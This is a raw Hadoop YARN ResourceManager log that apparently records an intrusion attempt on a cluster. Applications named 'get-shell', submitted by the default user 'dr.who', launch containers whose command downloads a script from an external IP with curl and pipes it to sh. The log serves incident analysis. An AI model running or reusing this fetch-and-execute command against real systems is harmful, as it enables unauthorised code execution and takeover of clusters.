2019-09-23 17:49:06,071 INFO org.apache.hadoop.yarn.server.resourcemanager.security.NMTokenSecretManagerInRM: Sending NMToken for nodeId : cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:42207 for container : container_1569279589137_0005_01_000001
2019-09-23 17:49:06,072 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569279589137_0005_01_000001 Container Transitioned from ALLOCATED to ACQUIRED
2019-09-23 17:49:06,072 INFO org.apache.hadoop.yarn.server.resourcemanager.security.NMTokenSecretManagerInRM: Clear node set for appattempt_1569279589137_0005_000001
2019-09-23 17:49:06,072 INFO org.apache.hadoop.yarn.server.resourcemanager.rmapp.attempt.RMAppAttemptImpl: Storing attempt: AppId: application_1569279589137_0005 AttemptId: appattempt_1569279589137_0005_000001 MasterContainer: Container: [ContainerId: container_1569279589137_0005_01_000001, NodeId: cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:42207, NodeHttpAddress: cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:8042, Resource: <memory:1024, vCores:1>, Priority: 0, Token: Token { kind: ContainerToken, service: 128.110.153.76:42207 }, ]
2019-09-23 17:49:06,073 INFO org.apache.hadoop.yarn.server.resourcemanager.rmapp.attempt.RMAppAttemptImpl: appattempt_1569279589137_0005_000001 State change from SCHEDULED to ALLOCATED_SAVING
2019-09-23 17:49:06,073 INFO org.apache.hadoop.yarn.server.resourcemanager.rmapp.attempt.RMAppAttemptImpl: appattempt_1569279589137_0005_000001 State change from ALLOCATED_SAVING to ALLOCATED
2019-09-23 17:49:06,074 INFO org.apache.hadoop.yarn.server.resourcemanager.amlauncher.AMLauncher: Launching masterappattempt_1569279589137_0005_000001
2019-09-23 17:49:06,076 INFO org.apache.hadoop.yarn.server.resourcemanager.amlauncher.AMLauncher: Setting up container Container: [ContainerId: container_1569279589137_0005_01_000001, NodeId: cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:42207, NodeHttpAddress: cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:8042, Resource: <memory:1024, vCores:1>, Priority: 0, Token: Token { kind: ContainerToken, service: 128.110.153.76:42207 }, ] for AM appattempt_1569279589137_0005_000001
2019-09-23 17:49:06,076 INFO org.apache.hadoop.yarn.server.resourcemanager.amlauncher.AMLauncher: Command to launch container container_1569279589137_0005_01_000001 : cur -fsSL http://185.181.10.234/E5DB0E07C3D7BE80V520/init.sh |sh
2019-09-23 17:49:06,077 INFO org.apache.hadoop.yarn.server.resourcemanager.security.AMRMTokenSecretManager: Create AMRMToken for ApplicationAttempt: appattempt_1569279589137_0005_000001
2019-09-23 17:49:06,077 INFO org.apache.hadoop.yarn.server.resourcemanager.security.AMRMTokenSecretManager: Creating password for appattempt_1569279589137_0005_000001
2019-09-23 17:49:06,089 INFO org.apache.hadoop.yarn.server.resourcemanager.amlauncher.AMLauncher: Done launching container Container: [ContainerId: container_1569279589137_0005_01_000001, NodeId: cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:42207, NodeHttpAddress: cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:8042, Resource: <memory:1024, vCores:1>, Priority: 0, Token: Token { kind: ContainerToken, service: 128.110.153.76:42207 }, ] for AM appattempt_1569279589137_0005_000001
2019-09-23 17:49:06,089 INFO org.apache.hadoop.yarn.server.resourcemanager.rmapp.attempt.RMAppAttemptImpl: appattempt_1569279589137_0005_000001 State change from ALLOCATED to LAUNCHED
2019-09-23 17:49:07,071 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569279589137_0005_01_000001 Container Transitioned from ACQUIRED to COMPLETED
2019-09-23 17:49:07,072 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FSAppAttempt: Completed container: container_1569279589137_0005_01_000001 in state: COMPLETED event:FINISHED
2019-09-23 17:49:07,072 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: USER=dr.who	OPERATION=AM Released Container	TARGET=SchedulerApp	RESULT=SUCCESS	APPID=application_1569279589137_0005	CONTAINERID=container_1569279589137_0005_01_000001
2019-09-23 17:49:07,072 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.SchedulerNode: Released container container_1569279589137_0005_01_000001 of capacity <memory:1024, vCores:1> on host cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:42207, which currently has 1 containers, <memory:1024, vCores:1> used and <memory:64512, vCores:31> available, release resources=true
2019-09-23 17:49:07,072 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FairScheduler: Application attempt appattempt_1569279589137_0005_000001 released container container_1569279589137_0005_01_000001 on node: host: cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:42207 #containers=1 available=<memory:64512, vCores:31> used=<memory:1024, vCores:1> with event: FINISHED
2019-09-23 17:49:07,072 INFO org.apache.hadoop.yarn.server.resourcemanager.rmapp.attempt.RMAppAttemptImpl: Updating application attempt appattempt_1569279589137_0005_000001 with final state: FAILED, and exit status: 0
2019-09-23 17:49:07,072 INFO org.apache.hadoop.yarn.server.resourcemanager.rmapp.attempt.RMAppAttemptImpl: appattempt_1569279589137_0005_000001 State change from LAUNCHED to FINAL_SAVING
2019-09-23 17:49:07,072 INFO org.apache.hadoop.yarn.server.resourcemanager.ApplicationMasterService: Unregistering app attempt : appattempt_1569279589137_0005_000001
2019-09-23 17:49:07,072 INFO org.apache.hadoop.yarn.server.resourcemanager.security.AMRMTokenSecretManager: Application finished, removing password for appattempt_1569279589137_0005_000001
2019-09-23 17:49:07,073 INFO org.apache.hadoop.yarn.server.resourcemanager.rmapp.attempt.RMAppAttemptImpl: appattempt_1569279589137_0005_000001 State change from FINAL_SAVING to FAILED
2019-09-23 17:49:07,073 INFO org.apache.hadoop.yarn.server.resourcemanager.rmapp.RMAppImpl: The number of failed attempts is 1. The max attempts is 2
2019-09-23 17:49:07,073 INFO org.apache.hadoop.yarn.server.resourcemanager.ApplicationMasterService: Registering app attempt : appattempt_1569279589137_0005_000002
2019-09-23 17:49:07,073 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FairScheduler: Application appattempt_1569279589137_0005_000001 is done. finalState=FAILED
2019-09-23 17:49:07,073 INFO org.apache.hadoop.yarn.server.resourcemanager.rmapp.attempt.RMAppAttemptImpl: appattempt_1569279589137_0005_000002 State change from NEW to SUBMITTED
2019-09-23 17:49:07,073 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.AppSchedulingInfo: Application application_1569279589137_0005 requests cleared
2019-09-23 17:49:07,074 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FairScheduler: Added Application Attempt appattempt_1569279589137_0005_000002 to scheduler from user: dr.who
2019-09-23 17:49:07,074 INFO org.apache.hadoop.yarn.server.resourcemanager.rmapp.attempt.RMAppAttemptImpl: appattempt_1569279589137_0005_000002 State change from SUBMITTED to SCHEDULED
2019-09-23 17:49:08,074 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569279589137_0005_02_000001 Container Transitioned from NEW to ALLOCATED
2019-09-23 17:49:08,074 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: USER=dr.who	OPERATION=AM Allocated Container	TARGET=SchedulerApp	RESULT=SUCCESS	APPID=application_1569279589137_0005	CONTAINERID=container_1569279589137_0005_02_000001
2019-09-23 17:49:08,074 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.SchedulerNode: Assigned container container_1569279589137_0005_02_000001 of capacity <memory:1024, vCores:1> on host cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:42207, which has 2 containers, <memory:2048, vCores:2> used and <memory:63488, vCores:30> available after allocation
2019-09-23 17:49:08,075 INFO org.apache.hadoop.yarn.server.resourcemanager.security.NMTokenSecretManagerInRM: Sending NMToken for nodeId : cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:42207 for container : container_1569279589137_0005_02_000001
2019-09-23 17:49:08,076 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569279589137_0005_02_000001 Container Transitioned from ALLOCATED to ACQUIRED
2019-09-23 17:49:08,076 INFO org.apache.hadoop.yarn.server.resourcemanager.security.NMTokenSecretManagerInRM: Clear node set for appattempt_1569279589137_0005_000002
2019-09-23 17:49:08,076 INFO org.apache.hadoop.yarn.server.resourcemanager.rmapp.attempt.RMAppAttemptImpl: Storing attempt: AppId: application_1569279589137_0005 AttemptId: appattempt_1569279589137_0005_000002 MasterContainer: Container: [ContainerId: container_1569279589137_0005_02_000001, NodeId: cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:42207, NodeHttpAddress: cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:8042, Resource: <memory:1024, vCores:1>, Priority: 0, Token: Token { kind: ContainerToken, service: 128.110.153.76:42207 }, ]
2019-09-23 17:49:08,077 INFO org.apache.hadoop.yarn.server.resourcemanager.rmapp.attempt.RMAppAttemptImpl: appattempt_1569279589137_0005_000002 State change from SCHEDULED to ALLOCATED_SAVING
2019-09-23 17:49:08,077 INFO org.apache.hadoop.yarn.server.resourcemanager.rmapp.attempt.RMAppAttemptImpl: appattempt_1569279589137_0005_000002 State change from ALLOCATED_SAVING to ALLOCATED
2019-09-23 17:49:08,078 INFO org.apache.hadoop.yarn.server.resourcemanager.amlauncher.AMLauncher: Launching masterappattempt_1569279589137_0005_000002
2019-09-23 17:49:08,081 INFO org.apache.hadoop.yarn.server.resourcemanager.amlauncher.AMLauncher: Setting up container Container: [ContainerId: container_1569279589137_0005_02_000001, NodeId: cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:42207, NodeHttpAddress: cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:8042, Resource: <memory:1024, vCores:1>, Priority: 0, Token: Token { kind: ContainerToken, service: 128.110.153.76:42207 }, ] for AM appattempt_1569279589137_0005_000002
2019-09-23 17:49:08,081 INFO org.apache.hadoop.yarn.server.resourcemanager.amlauncher.AMLauncher: Command to launch container container_1569279589137_0005_02_000001 : cur -fsSL http://185.181.10.234/E5DB0E07C3D7BE80V520/init.sh |sh
2019-09-23 17:49:08,081 INFO org.apache.hadoop.yarn.server.resourcemanager.security.AMRMTokenSecretManager: Create AMRMToken for ApplicationAttempt: appattempt_1569279589137_0005_000002
2019-09-23 17:49:08,081 INFO org.apache.hadoop.yarn.server.resourcemanager.security.AMRMTokenSecretManager: Creating password for appattempt_1569279589137_0005_000002
2019-09-23 17:49:08,093 INFO org.apache.hadoop.yarn.server.resourcemanager.amlauncher.AMLauncher: Done launching container Container: [ContainerId: container_1569279589137_0005_02_000001, NodeId: cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:42207, NodeHttpAddress: cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:8042, Resource: <memory:1024, vCores:1>, Priority: 0, Token: Token { kind: ContainerToken, service: 128.110.153.76:42207 }, ] for AM appattempt_1569279589137_0005_000002
2019-09-23 17:49:08,093 INFO org.apache.hadoop.yarn.server.resourcemanager.rmapp.attempt.RMAppAttemptImpl: appattempt_1569279589137_0005_000002 State change from ALLOCATED to LAUNCHED
2019-09-23 17:49:09,076 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569279589137_0005_02_000001 Container Transitioned from ACQUIRED to COMPLETED
2019-09-23 17:49:09,076 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FSAppAttempt: Completed container: container_1569279589137_0005_02_000001 in state: COMPLETED event:FINISHED
2019-09-23 17:49:09,076 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: USER=dr.who	OPERATION=AM Released Container	TARGET=SchedulerApp	RESULT=SUCCESS	APPID=application_1569279589137_0005	CONTAINERID=container_1569279589137_0005_02_000001
2019-09-23 17:49:09,076 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.SchedulerNode: Released container container_1569279589137_0005_02_000001 of capacity <memory:1024, vCores:1> on host cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:42207, which currently has 1 containers, <memory:1024, vCores:1> used and <memory:64512, vCores:31> available, release resources=true
2019-09-23 17:49:09,076 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FairScheduler: Application attempt appattempt_1569279589137_0005_000002 released container container_1569279589137_0005_02_000001 on node: host: cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:42207 #containers=1 available=<memory:64512, vCores:31> used=<memory:1024, vCores:1> with event: FINISHED
2019-09-23 17:49:09,076 INFO org.apache.hadoop.yarn.server.resourcemanager.rmapp.attempt.RMAppAttemptImpl: Updating application attempt appattempt_1569279589137_0005_000002 with final state: FAILED, and exit status: 0
2019-09-23 17:49:09,077 INFO org.apache.hadoop.yarn.server.resourcemanager.rmapp.attempt.RMAppAttemptImpl: appattempt_1569279589137_0005_000002 State change from LAUNCHED to FINAL_SAVING
2019-09-23 17:49:09,077 INFO org.apache.hadoop.yarn.server.resourcemanager.ApplicationMasterService: Unregistering app attempt : appattempt_1569279589137_0005_000002
2019-09-23 17:49:09,077 INFO org.apache.hadoop.yarn.server.resourcemanager.security.AMRMTokenSecretManager: Application finished, removing password for appattempt_1569279589137_0005_000002
2019-09-23 17:49:09,077 INFO org.apache.hadoop.yarn.server.resourcemanager.rmapp.attempt.RMAppAttemptImpl: appattempt_1569279589137_0005_000002 State change from FINAL_SAVING to FAILED
2019-09-23 17:49:09,077 INFO org.apache.hadoop.yarn.server.resourcemanager.rmapp.RMAppImpl: The number of failed attempts is 2. The max attempts is 2
2019-09-23 17:49:09,079 INFO org.apache.hadoop.yarn.server.resourcemanager.rmapp.RMAppImpl: Updating application application_1569279589137_0005 with final state: FAILED
2019-09-23 17:49:09,079 INFO org.apache.hadoop.yarn.server.resourcemanager.rmapp.RMAppImpl: application_1569279589137_0005 State change from ACCEPTED to FINAL_SAVING
2019-09-23 17:49:09,079 INFO org.apache.hadoop.yarn.server.resourcemanager.recovery.RMStateStore: Updating info for app: application_1569279589137_0005
2019-09-23 17:49:09,079 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FairScheduler: Application appattempt_1569279589137_0005_000002 is done. finalState=FAILED
2019-09-23 17:49:09,080 INFO org.apache.hadoop.yarn.server.resourcemanager.rmapp.RMAppImpl: Application application_1569279589137_0005 failed 2 times due to AM Container for appattempt_1569279589137_0005_000002 exited with  exitCode: 0
For more detailed output, check application tracking page:http://master_hostname:8088/cluster/app/application_1569279589137_0005Then, click on links to logs of each attempt.
Diagnostics: Failing this attempt. Failing the application.
2019-09-23 17:49:09,080 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.AppSchedulingInfo: Application application_1569279589137_0005 requests cleared
2019-09-23 17:49:09,080 INFO org.apache.hadoop.yarn.server.resourcemanager.rmapp.RMAppImpl: application_1569279589137_0005 State change from FINAL_SAVING to FAILED
2019-09-23 17:49:09,080 WARN org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: USER=dr.who	OPERATION=Application Finished - Failed	TARGET=RMAppManager	RESULT=FAILURE	DESCRIPTION=App failed with state: FAILED	PERMISSIONS=Application application_1569279589137_0005 failed 2 times due to AM Container for appattempt_1569279589137_0005_000002 exited with  exitCode: 0
For more detailed output, check application tracking page:http://master_hostname:8088/cluster/app/application_1569279589137_0005Then, click on links to logs of each attempt.
Diagnostics: Failing this attempt. Failing the application.	APPID=application_1569279589137_0005
2019-09-23 17:49:09,081 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAppManager$ApplicationSummary: appId=application_1569279589137_0005,name=get-shell,user=dr.who,queue=root.dr_dot_who,state=FAILED,trackingUrl=http://master_hostname:8088/cluster/app/application_1569279589137_0005,appMasterHost=N/A,startTime=1569282545398,finishTime=1569282549079,finalStatus=FAILED,memorySeconds=2053,vcoreSeconds=2,preemptedAMContainers=0,preemptedNonAMContainers=0,preemptedResources=<memory:0\, vCores:0>,applicationType=YARN
2019-09-23 17:59:49,155 INFO org.apache.hadoop.yarn.util.AbstractLivelinessMonitor: Expired:appattempt_1569279589137_0004_000001 Timed out after 600 secs
2019-09-23 17:59:49,156 INFO org.apache.hadoop.yarn.server.resourcemanager.rmapp.attempt.RMAppAttemptImpl: Updating application attempt appattempt_1569279589137_0004_000001 with final state: FAILED, and exit status: -1000
2019-09-23 17:59:49,157 INFO org.apache.hadoop.yarn.server.resourcemanager.rmapp.attempt.RMAppAttemptImpl: appattempt_1569279589137_0004_000001 State change from LAUNCHED to FINAL_SAVING
2019-09-23 17:59:49,157 INFO org.apache.hadoop.yarn.server.resourcemanager.ApplicationMasterService: Unregistering app attempt : appattempt_1569279589137_0004_000001
2019-09-23 17:59:49,157 INFO org.apache.hadoop.yarn.server.resourcemanager.security.AMRMTokenSecretManager: Application finished, removing password for appattempt_1569279589137_0004_000001
2019-09-23 17:59:49,157 INFO org.apache.hadoop.yarn.server.resourcemanager.rmapp.attempt.RMAppAttemptImpl: appattempt_1569279589137_0004_000001 State change from FINAL_SAVING to FAILED
2019-09-23 17:59:49,157 INFO org.apache.hadoop.yarn.server.resourcemanager.rmapp.RMAppImpl: The number of failed attempts is 1. The max attempts is 2
2019-09-23 17:59:49,158 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FairScheduler: Application appattempt_1569279589137_0004_000001 is done. finalState=FAILED
2019-09-23 17:59:49,158 INFO org.apache.hadoop.yarn.server.resourcemanager.ApplicationMasterService: Registering app attempt : appattempt_1569279589137_0004_000002
2019-09-23 17:59:49,158 INFO org.apache.hadoop.yarn.server.resourcemanager.rmapp.attempt.RMAppAttemptImpl: appattempt_1569279589137_0004_000002 State change from NEW to SUBMITTED
2019-09-23 17:59:49,158 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569279589137_0004_01_000001 Container Transitioned from RUNNING to KILLED
2019-09-23 17:59:49,158 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FSAppAttempt: Completed container: container_1569279589137_0004_01_000001 in state: KILLED event:KILL
2019-09-23 17:59:49,158 INFO org.apache.hadoop.yarn.server.resourcemanager.amlauncher.AMLauncher: Cleaning master appattempt_1569279589137_0004_000001
2019-09-23 17:59:49,158 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: USER=dr.who	OPERATION=AM Released Container	TARGET=SchedulerApp	RESULT=SUCCESS	APPID=application_1569279589137_0004	CONTAINERID=container_1569279589137_0004_01_000001
2019-09-23 17:59:49,159 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.SchedulerNode: Released container container_1569279589137_0004_01_000001 of capacity <memory:1024, vCores:1> on host cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:42207, which currently has 0 containers, <memory:0, vCores:0> used and <memory:65536, vCores:32> available, release resources=true
2019-09-23 17:59:49,159 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FairScheduler: Application attempt appattempt_1569279589137_0004_000001 released container container_1569279589137_0004_01_000001 on node: host: cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:42207 #containers=0 available=<memory:65536, vCores:32> used=<memory:0, vCores:0> with event: KILL
2019-09-23 17:59:49,159 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.AppSchedulingInfo: Application application_1569279589137_0004 requests cleared
2019-09-23 17:59:49,159 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FairScheduler: Added Application Attempt appattempt_1569279589137_0004_000002 to scheduler from user: dr.who
2019-09-23 17:59:49,159 INFO org.apache.hadoop.yarn.server.resourcemanager.rmapp.attempt.RMAppAttemptImpl: appattempt_1569279589137_0004_000002 State change from SUBMITTED to SCHEDULED
2019-09-23 17:59:49,171 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569279589137_0004_02_000001 Container Transitioned from NEW to ALLOCATED
2019-09-23 17:59:49,171 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: USER=dr.who	OPERATION=AM Allocated Container	TARGET=SchedulerApp	RESULT=SUCCESS	APPID=application_1569279589137_0004	CONTAINERID=container_1569279589137_0004_02_000001
2019-09-23 17:59:49,171 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.SchedulerNode: Assigned container container_1569279589137_0004_02_000001 of capacity <memory:1024, vCores:1> on host cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:42207, which has 1 containers, <memory:1024, vCores:1> used and <memory:64512, vCores:31> available after allocation
2019-09-23 17:59:49,172 INFO org.apache.hadoop.yarn.server.resourcemanager.security.NMTokenSecretManagerInRM: Sending NMToken for nodeId : cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:42207 for container : container_1569279589137_0004_02_000001
2019-09-23 17:59:49,172 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569279589137_0004_02_000001 Container Transitioned from ALLOCATED to ACQUIRED
2019-09-23 17:59:49,172 INFO org.apache.hadoop.yarn.server.resourcemanager.security.NMTokenSecretManagerInRM: Clear node set for appattempt_1569279589137_0004_000002
2019-09-23 17:59:49,172 INFO org.apache.hadoop.yarn.server.resourcemanager.rmapp.attempt.RMAppAttemptImpl: Storing attempt: AppId: application_1569279589137_0004 AttemptId: appattempt_1569279589137_0004_000002 MasterContainer: Container: [ContainerId: container_1569279589137_0004_02_000001, NodeId: cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:42207, NodeHttpAddress: cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:8042, Resource: <memory:1024, vCores:1>, Priority: 0, Token: Token { kind: ContainerToken, service: 128.110.153.76:42207 }, ]
2019-09-23 17:59:49,172 INFO org.apache.hadoop.yarn.server.resourcemanager.rmapp.attempt.RMAppAttemptImpl: appattempt_1569279589137_0004_000002 State change from SCHEDULED to ALLOCATED_SAVING
2019-09-23 17:59:49,172 INFO org.apache.hadoop.yarn.server.resourcemanager.rmapp.attempt.RMAppAttemptImpl: appattempt_1569279589137_0004_000002 State change from ALLOCATED_SAVING to ALLOCATED
2019-09-23 17:59:49,173 INFO org.apache.hadoop.yarn.server.resourcemanager.amlauncher.AMLauncher: Launching masterappattempt_1569279589137_0004_000002
2019-09-23 17:59:49,175 INFO org.apache.hadoop.yarn.server.resourcemanager.amlauncher.AMLauncher: Setting up container Container: [ContainerId: container_1569279589137_0004_02_000001, NodeId: cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:42207, NodeHttpAddress: cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:8042, Resource: <memory:1024, vCores:1>, Priority: 0, Token: Token { kind: ContainerToken, service: 128.110.153.76:42207 }, ] for AM appattempt_1569279589137_0004_000002
2019-09-23 17:59:49,175 INFO org.apache.hadoop.yarn.server.resourcemanager.amlauncher.AMLauncher: Command to launch container container_1569279589137_0004_02_000001 : curl -fsSL http://185.181.10.234/E5DB0E07C3D7BE80V520/init.sh |sh
2019-09-23 17:59:49,175 INFO org.apache.hadoop.yarn.server.resourcemanager.security.AMRMTokenSecretManager: Create AMRMToken for ApplicationAttempt: appattempt_1569279589137_0004_000002
2019-09-23 17:59:49,175 INFO org.apache.hadoop.yarn.server.resourcemanager.security.AMRMTokenSecretManager: Creating password for appattempt_1569279589137_0004_000002
2019-09-23 17:59:49,212 INFO org.apache.hadoop.yarn.server.resourcemanager.amlauncher.AMLauncher: Done launching container Container: [ContainerId: container_1569279589137_0004_02_000001, NodeId: cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:42207, NodeHttpAddress: cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:8042, Resource: <memory:1024, vCores:1>, Priority: 0, Token: Token { kind: ContainerToken, service: 128.110.153.76:42207 }, ] for AM appattempt_1569279589137_0004_000002
2019-09-23 17:59:49,212 INFO org.apache.hadoop.yarn.server.resourcemanager.rmapp.attempt.RMAppAttemptImpl: appattempt_1569279589137_0004_000002 State change from ALLOCATED to LAUNCHED
2019-09-23 17:59:50,175 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569279589137_0004_02_000001 Container Transitioned from ACQUIRED to RUNNING
2019-09-23 17:59:50,176 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FairScheduler: Null container completed...
2019-09-23 18:13:09,157 INFO org.apache.hadoop.yarn.util.AbstractLivelinessMonitor: Expired:appattempt_1569279589137_0004_000002 Timed out after 600 secs
2019-09-23 18:13:09,157 INFO org.apache.hadoop.yarn.server.resourcemanager.rmapp.attempt.RMAppAttemptImpl: Updating application attempt appattempt_1569279589137_0004_000002 with final state: FAILED, and exit status: -1000
2019-09-23 18:13:09,158 INFO org.apache.hadoop.yarn.server.resourcemanager.rmapp.attempt.RMAppAttemptImpl: appattempt_1569279589137_0004_000002 State change from LAUNCHED to FINAL_SAVING
2019-09-23 18:13:09,158 INFO org.apache.hadoop.yarn.server.resourcemanager.ApplicationMasterService: Unregistering app attempt : appattempt_1569279589137_0004_000002
2019-09-23 18:13:09,158 INFO org.apache.hadoop.yarn.server.resourcemanager.security.AMRMTokenSecretManager: Application finished, removing password for appattempt_1569279589137_0004_000002
2019-09-23 18:13:09,158 INFO org.apache.hadoop.yarn.server.resourcemanager.rmapp.attempt.RMAppAttemptImpl: appattempt_1569279589137_0004_000002 State change from FINAL_SAVING to FAILED
2019-09-23 18:13:09,158 INFO org.apache.hadoop.yarn.server.resourcemanager.rmapp.RMAppImpl: The number of failed attempts is 2. The max attempts is 2
2019-09-23 18:13:09,158 INFO org.apache.hadoop.yarn.server.resourcemanager.rmapp.RMAppImpl: Updating application application_1569279589137_0004 with final state: FAILED
2019-09-23 18:13:09,158 INFO org.apache.hadoop.yarn.server.resourcemanager.rmapp.RMAppImpl: application_1569279589137_0004 State change from ACCEPTED to FINAL_SAVING
2019-09-23 18:13:09,158 INFO org.apache.hadoop.yarn.server.resourcemanager.recovery.RMStateStore: Updating info for app: application_1569279589137_0004
2019-09-23 18:13:09,158 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FairScheduler: Application appattempt_1569279589137_0004_000002 is done. finalState=FAILED
2019-09-23 18:13:09,158 INFO org.apache.hadoop.yarn.server.resourcemanager.rmapp.RMAppImpl: Application application_1569279589137_0004 failed 2 times due to ApplicationMaster for attempt appattempt_1569279589137_0004_000002 timed out. Failing the application.
2019-09-23 18:13:09,158 INFO org.apache.hadoop.yarn.server.resourcemanager.rmapp.RMAppImpl: application_1569279589137_0004 State change from FINAL_SAVING to FAILED
2019-09-23 18:13:09,158 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569279589137_0004_02_000001 Container Transitioned from RUNNING to KILLED
2019-09-23 18:13:09,158 WARN org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: USER=dr.who	OPERATION=Application Finished - Failed	TARGET=RMAppManager	RESULT=FAILURE	DESCRIPTION=App failed with state: FAILED	PERMISSIONS=Application application_1569279589137_0004 failed 2 times due to ApplicationMaster for attempt appattempt_1569279589137_0004_000002 timed out. Failing the application.	APPID=application_1569279589137_0004
2019-09-23 18:13:09,158 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FSAppAttempt: Completed container: container_1569279589137_0004_02_000001 in state: KILLED event:KILL
2019-09-23 18:13:09,158 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: USER=dr.who	OPERATION=AM Released Container	TARGET=SchedulerApp	RESULT=SUCCESS	APPID=application_1569279589137_0004	CONTAINERID=container_1569279589137_0004_02_000001
2019-09-23 18:13:09,159 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.SchedulerNode: Released container container_1569279589137_0004_02_000001 of capacity <memory:1024, vCores:1> on host cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:42207, which currently has 0 containers, <memory:0, vCores:0> used and <memory:65536, vCores:32> available, release resources=true
2019-09-23 18:13:09,159 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FairScheduler: Application attempt appattempt_1569279589137_0004_000002 released container container_1569279589137_0004_02_000001 on node: host: cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:42207 #containers=0 available=<memory:65536, vCores:32> used=<memory:0, vCores:0> with event: KILL
2019-09-23 18:13:09,159 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.AppSchedulingInfo: Application application_1569279589137_0004 requests cleared
2019-09-23 18:13:09,159 INFO org.apache.hadoop.yarn.server.resourcemanager.amlauncher.AMLauncher: Cleaning master appattempt_1569279589137_0004_000002
2019-09-23 18:13:09,159 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAppManager$ApplicationSummary: appId=application_1569279589137_0004,name=get-shell,user=dr.who,queue=root.dr_dot_who,state=FAILED,trackingUrl=http://master_hostname:8088/cluster/app/application_1569279589137_0004,appMasterHost=N/A,startTime=1569282513717,finishTime=1569283989158,finalStatus=FAILED,memorySeconds=1510530,vcoreSeconds=1474,preemptedAMContainers=0,preemptedNonAMContainers=0,preemptedResources=<memory:0\, vCores:0>,applicationType=YARN
2019-09-23 18:13:10,177 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FairScheduler: Null container completed...
2019-09-23 18:13:10,178 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FairScheduler: Null container completed...
